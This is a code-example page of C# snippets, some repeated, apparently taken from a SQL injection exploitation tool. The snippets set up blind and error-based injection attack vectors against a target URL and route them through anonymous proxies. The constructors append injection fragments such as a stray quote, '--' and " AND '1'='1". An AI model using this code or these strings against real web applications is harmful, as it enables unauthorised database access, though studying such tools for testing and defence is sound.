Beispiel #1
0
        /// <summary>
        /// Converts the Attack Vector from the native type to XML
        /// </summary>
        /// <param name="xInput">The XML node to start deserialization</param>
        /// <param name="AnonProxies">Any anonymous proxies being used</param>
        public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
        {
            string FullUrl;

            if (!_UseSSL)
            {
                FullUrl = "http://" + _TargetURL;
            }
            else
            {
                FullUrl = "https://" + _TargetURL;
            }

            XmlNode n = xInput.SelectSingleNode("attackvector");

            if (n == null)
            {
                return;
            }

            InjectionOptions opts;

            if (_IsBlind)
            {
                opts = new BlindInjectionOptions();
                ((BlindInjectionOptions)opts).Delimiter = _FilterDelimiter;
                ((BlindInjectionOptions)opts).Tolerance = _Tolerance;
                ((BlindInjectionOptions)opts).Throttle  = _ThrottleValue;
            }
            else
            {
                opts = new ErrorInjectionOptions();
            }

            opts.TerminateQuery = _TerminateQuery;
            opts.WebProxies     = AnonProxies;

            AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);

            _TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));

            _TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
        }
Beispiel #2
0
        private void InitializeAttackVectors()
        {
            string URL;

            URL = ctlConnection1.UseSsl == true ? "https://" : "http://";
            URL += ctlConnection1.TargetUrl;

            string Method = ctlConnection1.ConnectMethod;

            if (Method.Equals("")) return;

            SafelyChangeCursor(Cursors.WaitCursor);

            // Generate StringDict
            string TargetName, TargetField;
            bool InjectAsString;
            TargetName = String.Empty; TargetField = String.Empty;

            NameValueCollection Others = new NameValueCollection();
            NameValueCollection Cookies = new NameValueCollection();

            Others = FormParameters.FormParameters(ref TargetName, ref TargetField, out InjectAsString);
            Cookies = FormParameters.Cookies;

            if (TargetName.Equals(String.Empty))
            {
                UserStatus("No Injection Point Found");
                SafelyChangeCursor(Cursors.Default);
                return;
            }

            UserStatus("Beginning Preliminary Scan");

            try
            {
                SafelyChangeEnableOfControl(butInitializeInjection, false);

                AttackVectorFactory avf;

                InjectionOptions opts;
                if (optBlindInjection.Checked == true)
                {
                    opts = new BlindInjectionOptions();

                    ((BlindInjectionOptions)opts).Tolerance = _AbsintheState.FilterTolerance;
                    ((BlindInjectionOptions)opts).Delimiter = _AbsintheState.FilterDelimiter;
                }
                else
                {
                    opts = new ErrorInjectionOptions();
                    ((ErrorInjectionOptions)opts).VerifyVersion = chkVerifyVersion.Checked;
                }

                opts.TerminateQuery = _AbsintheState.TerminateQuery;
                opts.Cookies = Cookies;
                opts.WebProxies = _AppSettings.ProxyQueue();
                opts.InjectAsString = InjectAsString;
                opts.UserAgent = _AbsintheState.UserAgent;

                opts.AuthCredentials = ctlUserAuth1.NetworkCredential;
                opts.AppendedQuery = _AbsintheState.AppendedText;

                avf = new AttackVectorFactory(URL, TargetName, TargetField, Others, Method, opts);
                avf.UserStatus += new UserEvents.UserStatusEventHandler(UserStatus);

                int PluginNumber = Array.IndexOf(_PluginEntries, _AbsintheState.LoadedPluginName);

                IPlugin pt = null;

                if (optBlindInjection.Checked)
                {
                    foreach (IPlugin bp in _AbsintheState.PluginList)
                    {
                        if (bp.GetType().GetInterface("IBlindPlugin") != null)
                        {
                            if (bp.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
                            {
                                pt = (IPlugin)bp;
                                break;
                            }
                        }
                    }

                    _AbsintheState.TargetAttackVector = avf.BuildBlindSqlAttackVector(_AbsintheState.FilterTolerance, (IBlindPlugin)pt);
                    UserStatus("Finished initial scan");
                }
                else if (optErrorBasedInjection.Checked)
                {
                    if (PluginNumber <= 0)
                    {
                        pt = AutoDetectPlugin(avf);
                    }
                    else
                    {
                        foreach (IPlugin ep in _AbsintheState.PluginList)
                        {
                            if (ep.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
                            {
                                pt = (IPlugin)ep;
                                break;
                            }
                        }
                    }
                    if (pt != null)
                    {
                        try
                        {
                            _AbsintheState.TargetAttackVector = avf.BuildSqlErrorAttackVector((IErrorPlugin)pt);
                            UserStatus("Finished initial scan");
                        }
                        catch (UnsupportedSQLErrorVersionException sqlex)
                        {
                            ErrorReportingDelegate ts = new ErrorReportingDelegate(ThreadUnsafeDisplayErrorReportDialog);
                            this.Invoke(ts, new object[] { sqlex.VersionErrorPageHtml, sqlex.HavingErrorPageHtml });
                        }
                    }
                }

            }
            catch (Exception e)
            {
                System.Diagnostics.Debug.WriteLine(e.ToString());
                UserStatus(e.Message);
            }
            finally
            {
                SafelyChangeEnableOfControl(butInitializeInjection, true);
                SafelyChangeCursor(Cursors.Default);
            }
        }
        private BlindSqlAttackVector DeserializeBlindSqlAttackVectorXml(XmlNode VectorNode, BlindInjectionOptions opts, IBlindPlugin PluginUsed)
        {
            double[] TrueSig    = null, FalseSig = null;
            int[]    TrueFilter = null, FalseFilter = null;

            foreach (XmlNode n in VectorNode.ChildNodes)
            {
                switch (n.Name)
                {
                case "truepage":
                    //_ParentOutput("Deserializing True signature.. ");
                    TrueSig = ExtractSignatureFromXml(n);
                    break;

                case "falsepage":
                    //_ParentOutput("Deserializing False signature.. ");
                    FalseSig = ExtractSignatureFromXml(n);
                    break;

                case "truefilter":
                    //_ParentOutput("Deserializing True Filter.. ");
                    TrueFilter = ExtractFilterFromXml(n);
                    break;

                case "falsefilter":
                    //_ParentOutput("Deserializing False filter.. ");
                    FalseFilter = ExtractFilterFromXml(n);
                    break;
                }
            }

            if (TrueSig == null || FalseSig == null || TrueFilter == null || FalseFilter == null)
            {
                return(null);
            }

            string Name   = String.Empty;
            string Buffer = String.Empty;

            if (VectorNode.Attributes["Delimiter"] != null)
            {
                ((BlindInjectionOptions)opts).Delimiter = VectorNode.Attributes["Delimiter"].InnerText;
            }
            if (VectorNode.Attributes["tolerance"] != null)
            {
                opts.Tolerance = System.Single.Parse(VectorNode.Attributes["tolerance"].InnerText);
            }
            if (VectorNode.Attributes["name"] != null)
            {
                Name = VectorNode.Attributes["name"].InnerText;
            }
            if (VectorNode.Attributes["buffer"] != null)
            {
                Buffer = VectorNode.Attributes["buffer"].InnerText;
            }
            if (VectorNode.Attributes["InjectAsString"] != null)
            {
                opts.InjectAsString = System.Boolean.Parse(VectorNode.Attributes["InjectAsString"].InnerText);
            }

            return(new BlindSqlAttackVector(_TargetURL, Name, Buffer, _AttackParams, _Method, PluginUsed, TrueSig, FalseSig, TrueFilter, FalseFilter, opts));
        }
		///<summary>Public constructor for instantiation.</summary>
		///<param name="URL">The URL of the target web application, including file path</param>
		///<param name="VectorName">The name of the parameter to use as the injection point</param>
		///<param name="VectorBuffer">The default value to store in the injectable parameter</param>
		///<param name="AdditionalParams">All parameters (names and values) that are used, but not chosen as injection points</param>
		///<param name="Method">The HTTP connection method. This can be "GET" or "POST"</param>
		///<param name="PluginUsed">The Plugin being used for the connection</param>
		///<param name="TruePage">The signature for the page representing a "true" value</param>
		///<param name="FalsePage">The signature for the page representing a "false" value</param>
		///<param name="TrueFilterIn">The indices of the signature relevant for comparing an unknown to the true signature</param>
		///<param name="FalseFilterIn">The indices of the signature relevant for comparing an unknown to the false signature</param>
		///<param name="Options">The InjectionOptions to use for all requests</param>
		public BlindSqlAttackVector(string URL, string VectorName, string VectorBuffer, NameValueCollection AdditionalParams, string Method, IBlindPlugin PluginUsed,
				double[] TruePage, double[] FalsePage, 
				int[] TrueFilterIn, int[] FalseFilterIn, BlindInjectionOptions Options)
		{
			_ConnectViaPost = String.Equals(Method.ToUpper(), "POST");
			_TargetURL = URL;
			_VectorName = VectorName;
			_VectorBuffer = VectorBuffer;
			_Options = Options;
			_PluginData = PluginUsed;
			
			if (_Options.InjectAsString) _VectorBuffer += "'";
			
			_AttackParams = AdditionalParams;

			TruePageSignature = TruePage;
			FalsePageSignature = FalsePage;
			TrueFilter = TrueFilterIn;
			FalseFilter = FalseFilterIn;
			
			_VectorPostBuffer = String.Empty;
			if (_Options.TerminateQuery)
			{
				_VectorPostBuffer += "--";
			}
			else if (_Options.AppendedQuery.Length > 0)
			{
				_VectorPostBuffer += _Options.AppendedQuery;
			}
			else if (_Options.InjectAsString)
			{
				_VectorPostBuffer = " AND '1'='1";
			}


			_VectorBuffer += " "; // Required so plugins aren't required to add the spaces
			_Proxies = Options.WebProxies;

			ParsePage.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
		}
		///<summary>Public constructor for instantiation.</summary>
		///<param name="URL">The URL of the target web application, including file path</param>
		///<param name="VectorName">The name of the parameter to use as the injection point</param>
		///<param name="VectorBuffer">The default value to store in the injectable parameter</param>
		///<param name="AdditionalParams">All parameters (names and values) that are used, but not chosen as injection points</param>
		///<param name="Method">The HTTP connection method. This can be "GET" or "POST"</param>
		///<param name="PluginUsed">The Plugin being used for the connection</param>
		///<param name="Options">The InjectionOptions to use for all connections</param>
		public BlindSqlAttackVector(string URL, string VectorName, string VectorBuffer, NameValueCollection AdditionalParams, string Method, IBlindPlugin PluginUsed,
				BlindInjectionOptions Options)
		{			
			_Proxies = Options.WebProxies;
			if (PluginUsed == null) UserStatus("Null plugin");
			_PluginData = PluginUsed;
			_Options = Options;			
			_ConnectViaPost = String.Equals(Method.ToUpper(), "POST");
			_TargetURL = URL;
			_VectorName = VectorName;
			_VectorBuffer = VectorBuffer;
			if (_Options.InjectAsString) _VectorBuffer += "'";
			_AttackParams = AdditionalParams;

			ParsePage.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
			//Initialize();//URL, VectorName, VectorBuffer, AdditionalParams, Method);
		}
		private BlindSqlAttackVector DeserializeBlindSqlAttackVectorXml(XmlNode VectorNode, BlindInjectionOptions opts, IBlindPlugin PluginUsed)
		{
			double[] TrueSig = null, FalseSig = null;
			int[] TrueFilter = null, FalseFilter = null;

			foreach (XmlNode n in VectorNode.ChildNodes)
			{
				switch (n.Name)
				{
					case "truepage":
						//_ParentOutput("Deserializing True signature.. ");
						TrueSig = ExtractSignatureFromXml(n);
						break;
					case "falsepage":
						//_ParentOutput("Deserializing False signature.. ");
						FalseSig = ExtractSignatureFromXml(n);
						break;
					case "truefilter":
						//_ParentOutput("Deserializing True Filter.. ");
						TrueFilter = ExtractFilterFromXml(n);
						break;
					case "falsefilter":
						//_ParentOutput("Deserializing False filter.. ");
						FalseFilter = ExtractFilterFromXml(n);
						break;
				}
			}

			if (TrueSig == null || FalseSig == null || TrueFilter == null || FalseFilter == null) return null;
			
			string Name = String.Empty;
			string Buffer = String.Empty;

			if (VectorNode.Attributes["Delimiter"] != null) ((BlindInjectionOptions) opts).Delimiter = VectorNode.Attributes["Delimiter"].InnerText;
			if (VectorNode.Attributes["tolerance"] != null) opts.Tolerance = System.Single.Parse(VectorNode.Attributes["tolerance"].InnerText);
			if (VectorNode.Attributes["name"] != null) Name = VectorNode.Attributes["name"].InnerText;
			if (VectorNode.Attributes["buffer"] != null) Buffer = VectorNode.Attributes["buffer"].InnerText;
			if (VectorNode.Attributes["InjectAsString"] != null)  opts.InjectAsString = System.Boolean.Parse(VectorNode.Attributes["InjectAsString"].InnerText);
 
			return new BlindSqlAttackVector(_TargetURL, Name, Buffer, _AttackParams, _Method, PluginUsed, TrueSig, FalseSig, TrueFilter, FalseFilter, opts);
		}
Beispiel #7
0
        /// <summary>
        /// Converts the Attack Vector from the native type to XML
        /// </summary>
        /// <param name="xInput">The XML node to start deserialization</param>
        /// <param name="AnonProxies">Any anonymous proxies being used</param>
		public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
		{
			string FullUrl;
			if (!_UseSSL) FullUrl = "http://" + _TargetURL;
			else FullUrl = "https://" + _TargetURL;

			XmlNode n = xInput.SelectSingleNode("attackvector");	
			if (n == null) return;

			InjectionOptions opts;
			if (_IsBlind)
			{
				opts = new BlindInjectionOptions();
				((BlindInjectionOptions) opts).Delimiter = _FilterDelimiter;
				((BlindInjectionOptions) opts).Tolerance = _Tolerance;
				((BlindInjectionOptions) opts).Throttle = _ThrottleValue;
			}
			else
				opts = new ErrorInjectionOptions();		

			opts.TerminateQuery = _TerminateQuery;
			opts.WebProxies = AnonProxies;

			AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
			_TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));

			_TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
		}